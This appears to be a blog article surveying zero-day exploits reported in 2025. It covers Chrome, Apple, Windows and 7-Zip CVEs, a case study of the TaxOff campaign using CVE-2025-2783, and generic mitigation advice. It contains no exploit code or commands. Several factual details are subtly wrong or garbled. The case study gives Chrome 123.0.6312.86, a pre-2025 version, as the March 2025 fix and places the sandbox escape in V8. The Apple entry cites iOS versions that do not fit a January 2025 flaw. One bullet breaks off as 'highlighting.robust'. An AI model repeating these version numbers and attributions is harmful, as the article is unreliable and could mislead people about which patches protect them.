Recent Examples of Zero-Day Exploits Observed in 2025

Zero-day exploits, which target vulnerabilities unknown to software vendors at the time of exploitation, remain one of the most critical threats in cybersecurity. In 2025, the cybersecurity landscape has continued to evolve, with zero-day exploits being leveraged by a range of threat actors, including nation-state groups, commercial surveillance vendors (CSVs), and financially motivated cybercriminals. These exploits are particularly dangerous because they bypass traditional security measures, such as signature-based antivirus or intrusion detection systems, and exploit unpatched flaws, leaving systems vulnerable until vendors release fixes. This article examines recent examples of zero-day exploits observed in 2025, drawing on available data to highlight their characteristics, impact, and mitigation strategies, and provides a detailed case study of one significant exploit to illustrate their real-world implications.

The Context of Zero-Day Exploits in 2025

The year 2025 has seen a continuation of trends observed in previous years, with zero-day exploits targeting a mix of end-user platforms (e.g., browsers, mobile devices) and enterprise technologies (e.g., security software, networking appliances). According to reports, the number of zero-day vulnerabilities exploited in the wild has fluctuated but remains significant, with Google’s Threat Intelligence Group (GTIG) tracking 75 zero-days in 2024, a slight decrease from 98 in 2023 but an increase from 63 in 2022. In 2025, the focus on enterprise-specific technologies has grown, with 44% of zero-days in 2024 targeting such systems, a trend that persists into 2025. Additionally, the proliferation of AI-driven attack techniques and the increasing sophistication of commercial spyware vendors have heightened the potency of zero-day exploits.

Zero-day exploits in 2025 are characterized by:

  • Diverse Targets: Vulnerabilities in widely used software, such as Microsoft Windows, Google Chrome, and Apple’s Core Media framework, as well as enterprise solutions like Ivanti appliances, are prime targets.

  • Sophisticated Attackers: Nation-state actors, particularly those attributed to the People’s Republic of China (PRC), and CSVs dominate zero-day exploitation, often for espionage or surveillance purposes.

  • Rapid Exploitation: Attackers are exploiting vulnerabilities faster, sometimes within a day of public disclosure, leveraging automated tools and AI to craft dynamic exploits.

  • Complex Delivery Methods: Phishing, malvertising, and social engineering tactics, such as ClickFix-style lures, are commonly used to deliver zero-day exploits.

The following sections highlight specific examples of zero-day exploits observed in 2025, based on available data, and provide a deeper analysis of one case to illustrate their impact.

Recent Zero-Day Exploits in 2025

1. Apple Core Media Framework Zero-Day (CVE-2025-24085)

In January 2025, Apple disclosed a zero-day vulnerability in its Core Media framework, affecting iPhones, iPads, Macs, Apple TVs, and other devices running iOS versions prior to 17.2. This use-after-free vulnerability (CVE-2025-24085) allowed privilege escalation through maliciously crafted media files, enabling attackers to execute arbitrary code. The flaw was exploited in the wild, with reports indicating it targeted users via media applications. Apple released patches to address the issue, credited to researchers from Oligo Security and Google’s Threat Analysis Group (TAG). The exploit’s severity stemmed from its ability to compromise a wide range of Apple devices, highlighting the risks of vulnerabilities in media processing components.

2. Google Chrome Zero-Days (CVE-2025-2783, CVE-2025-5419, CVE-2025-6554)

Google Chrome faced multiple zero-day exploits in 2025, reflecting its status as a high-value target due to its widespread use. Three notable vulnerabilities were:

  • CVE-2025-2783: A sandbox escape flaw exploited by the TaxOff group in March 2025, targeting Russian organizations via phishing emails disguised as invitations to the Primakov Readings forum. The exploit deployed the Trinper backdoor, enabling persistent access to compromised systems. Google patched this flaw in late March 2025 after detection by Kaspersky and Positive Technologies.

  • CVE-2025-5419: A high-severity flaw in Chrome’s V8 engine, discovered by Google TAG in June 2025, was exploited via malicious HTML pages. Attackers used this to execute arbitrary code, with patches released promptly to mitigate the threat.

  • CVE-2025-6554: Another V8 engine vulnerability, identified by Google TAG on June 25, 2025, allowed remote code execution through crafted web pages. This zero-day was actively exploited, prompting urgent updates to Chrome.

These exploits underscore Chrome’s vulnerability to zero-days, particularly in its V8 engine, and the rapid response required to protect users.

3. Microsoft Windows CLFS Zero-Day (CVE-2025-29824)

In April 2025, Microsoft disclosed a zero-day vulnerability in the Common Log File System (CLFS) driver (CVE-2025-29824), exploited by the Storm-2460 group to deploy the PipeMagic malware. This privilege escalation flaw targeted a small number of organizations in the United States, with attackers using malicious MSBuild files downloaded via the certutil utility to gain elevated access. Although ransomware was not deployed, the Grixba information stealer was used, indicating a focus on data exfiltration. Microsoft released patches on April 8, 2025, urging immediate updates. This exploit highlights the growing trend of zero-days targeting Windows components for post-compromise escalation.

4. Microsoft Windows MSHTML Zero-Day (CVE-2024-38112)

Although initially exploited in 2024, the MSHTML component vulnerability in Windows (CVE-2024-38112) continued to see activity in early 2025. This remote code execution flaw was exploited via malicious Internet shortcut files (.URL), spreading information-stealing malware. The U.S. Cybersecurity & Infrastructure Security Agency (CISA) identified it among 116 vulnerabilities actively exploited in 2024, with 28 targeting Windows. Its persistence into 2025 underscores the challenges of patching legacy components and the prolonged exploitation window for unpatched systems.

5. Microsoft Windows NTFS Zero-Days (CVE-2025-24991, CVE-2025-24993)

In March 2025, Microsoft patched two zero-day vulnerabilities in the NTFS file system (CVE-2025-24991, CVE-2025-24993), both exploited in the wild. These flaws required attackers to trick users into mounting malicious virtual hard disks, enabling local code execution or memory disclosure. ESET researchers reported their use via the PipeMagic backdoor, which facilitated data exfiltration and remote access. These exploits targeted older Windows versions (e.g., Windows 8.1, Server 2012 R2), highlighting risks in unsupported or unpatched systems.

6. Microsoft Management Console Zero-Day (CVE-2025-26633)

Another March 2025 Patch Tuesday fix addressed a zero-day in the Microsoft Management Console (CVE-2025-26633), which allowed code execution if a user opened a malicious file. This flaw, exploited in the wild, posed risks to system administrators managing Windows environments. Microsoft’s rapid patching mitigated the threat, but the exploit’s reliance on user interaction underscores the role of social engineering in zero-day attacks.

7. Stealth Falcon’s Microsoft Zero-Day (CVE-2025-33053)

In June 2025, Check Point Research uncovered a zero-day vulnerability (CVE-2025-33053) exploited by the Stealth Falcon APT group, targeting entities in the Middle East and Africa. This remote code execution flaw in Windows was exploited via WebDAV and living-off-the-land binaries (LOLBins), using a novel technique to execute files from a remote server. Microsoft patched the vulnerability on June 10, 2025, following responsible disclosure. The exploit’s sophistication, including code obfuscation with tools like Code Virtualizer, highlights the advanced tactics of espionage-focused groups.

8. 7-Zip Zero-Day (CVE-2025-0411)

In February 2025, a zero-day vulnerability in the 7-Zip file compression utility (CVE-2025-0411) was reported to have been exploited in September 2024, with activity continuing into 2025. Russian threat actors used this flaw to deploy the SmokeLoader malware for espionage operations targeting Ukraine. The exploit’s discovery by security researchers and its patching in early 2025 emphasize the risks in widely used utilities.

Case Study: Google Chrome Zero-Day (CVE-2025-2783) and the TaxOff Campaign

Background

One of the most notable zero-day exploits in 2025 was CVE-2025-2783, a sandbox escape vulnerability in Google Chrome’s V8 engine, exploited by the TaxOff threat group in March 2025. This high-severity flaw (CVSS score: 8.3) allowed attackers to execute arbitrary code, bypassing Chrome’s sandbox protections. The attack targeted Russian organizations, leveraging phishing emails disguised as invitations to the Primakov Readings forum, a tactic dubbed Operation ForumTroll by Kaspersky.

Exploitation

The attack began with a phishing campaign, where victims received emails containing a malicious link. Clicking the link directed users to a fake website hosting the CVE-2025-2783 exploit, which triggered a one-click compromise. The exploit installed the Trinper backdoor, a sophisticated malware designed for long-term persistence and data exfiltration. The campaign also used a variation involving a ZIP archive with a Windows shortcut file, executing PowerShell commands to deploy the backdoor via the Donut loader or Cobalt Strike. Positive Technologies noted tactical similarities with another group, Team46, suggesting possible overlap.

Impact

The CVE-2025-2783 exploit had significant implications:

  • Targeted Espionage: The attack focused on Russian organizations, likely for intelligence-gathering purposes, highlighting.robust

  • Widespread Use of Chrome: Chrome’s global popularity made the exploit a broad threat, though the campaign was geographically targeted.

  • Persistent Access: The Trinper backdoor enabled attackers to maintain long-term access, facilitating data theft and further attacks.

  • Rapid Spread: The phishing-based delivery method allowed the exploit to reach multiple victims quickly.

Response

Google’s Threat Analysis Group and Kaspersky detected the exploit in mid-March 2025, prompting Google to release a patch later that month. Users were urged to update Chrome immediately to version 123.0.6312.86 or later. The rapid response limited the exploitation window, but unpatched systems remained vulnerable.

Lessons Learned

This exploit highlighted the dangers of zero-days in popular browsers and the effectiveness of social engineering in delivering them. It also emphasized the importance of timely updates and user awareness to combat phishing attacks. The use of advanced malware like Trinper underscores the need for behavioral detection tools to identify post-compromise activities.

Trends and Observations in 2025

The 2025 zero-day exploits reflect several trends:

  • Enterprise Focus: The increasing targeting of enterprise technologies, such as Ivanti appliances and security software, indicates a shift toward compromising network infrastructure.

  • AI-Driven Attacks: AI is being used to generate dynamic exploit payloads, making zero-days harder to detect.

  • Espionage Dominance: Over 50% of zero-days in 2024 were used for espionage, a trend continuing into 2025 with groups like Stealth Falcon and TaxOff.

  • Commercial Surveillance Vendors: CSVs continue to exploit zero-days, particularly for mobile devices, using physical access techniques like malicious USB devices.

Mitigation Strategies

To protect against zero-day exploits in 2025, organizations should:

  • Prompt Patching: Apply security updates immediately, as seen with the rapid patches for CVE-2025-24085 and CVE-2025-2783.

  • Behavioral Detection: Use EDR tools to detect anomalous behavior, such as unexpected privilege escalation or network traffic.

  • Network Segmentation: Isolate critical systems to limit the spread of an attack.

  • User Education: Train users to recognize phishing and social engineering tactics, as seen in the TaxOff campaign.

  • Threat Intelligence: Monitor threat intelligence feeds for early warnings of zero-day exploits.

  • Zero Trust Architecture: Enforce strict access controls and continuous verification to reduce attack surfaces.

Conclusion

Zero-day exploits in 2025 continue to pose a significant threat due to their ability to bypass traditional defenses and target unpatched vulnerabilities. Examples like the Chrome CVE-2025-2783 exploit, Apple’s Core Media flaw, and Microsoft’s CLFS and NTFS vulnerabilities demonstrate the diverse attack surfaces, from browsers to enterprise systems. The TaxOff campaign’s use of CVE-2025-2783 illustrates the sophistication of modern zero-day attacks, combining phishing, sandbox escapes, and persistent malware. As attackers leverage AI and target enterprise technologies, organizations must adopt proactive security measures, including rapid patching, advanced monitoring, and user education, to mitigate the risks of these potent cyber threats.

Shubhleen Kaur

Posts